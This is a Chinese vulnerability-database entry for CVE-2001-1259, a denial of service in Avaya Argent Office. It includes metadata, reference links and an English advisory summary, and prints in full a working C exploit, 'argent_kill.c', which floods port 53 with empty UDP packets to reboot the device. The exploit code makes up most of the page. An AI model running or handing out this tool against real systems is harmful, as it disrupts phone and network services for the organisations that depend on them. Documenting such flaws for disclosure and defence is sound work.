Avaya Argent Office服务拒绝漏洞

Avaya Argent Office服务拒绝漏洞

漏洞ID 1106459 漏洞类型 未知
发布时间 2001-08-07 更新时间 2001-08-07
图片[1]-Avaya Argent Office服务拒绝漏洞-安全小百科CVE编号 CVE-2001-1259
图片[2]-Avaya Argent Office服务拒绝漏洞-安全小百科CNNVD-ID CNNVD-200108-035
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/23337
https://www.securityfocus.com/bid/87006
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200108-035
|漏洞详情
AvayaArgentOffice存在漏洞。远程攻击者通过无负载的发送UDP数据包到端口53导致服务拒绝。
|漏洞EXP
source: http://www.securityfocus.com/bid/8976/info

It has been reported that Avaya Argent Office is prone to a denial of service condition when handling malformed DNS packets. The problem is said to occur when a DNS packet with no payload is handled. Receiving the packet is said to cause the device to reboot. 

/* argent_kill.c 
(c) 2001 Jacek Lipkowski sq5bpf acid ch pw edu pl
Reboots an Argent Office box by sending udp packets with no payload to port 53
usage: argent_kill ip_address
*/

#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>

main(int argc, char *argv[])
{
struct sockaddr_in addr;
struct hostent *host;
int s;

s=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if (s==-1) { perror("socket()"); exit(1); }
host=gethostbyname(argv[1]);
if (host==0) { herror("gethostbyname"); exit(1); }
memcpy(&addr.sin_addr,host->h_addr,host->h_length);
addr.sin_port=htons(53);
addr.sin_family=AF_INET;
if (connect(s,&addr,16)==-1) { perror("connect()"); exit(1); }
for (;;)
{
send(s,0,0,0); sleep(1); printf("."); fflush(stdout);
}
close(s);
}
|受影响的产品
Avaya Argent Office 0
|参考资料

来源:XF
名称:argent-office-udp-dos(6953)
链接:http://www.iss.net/security_center/static/6953.php
来源:BUGTRAQ
名称:20010807MultiplevulnerabilitiesinAvayaArgentOffice
链接:http://online.securityfocus.com/archive/1/202344

相关推荐: Linux kernel漏洞

Linux kernel漏洞 漏洞ID 1205834 漏洞类型 未知 发布时间 2001-04-17 更新时间 2001-04-17 CVE编号 CVE-2001-1397 CNNVD-ID CNNVD-200104-011 漏洞平台 N/A CVSS评分 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享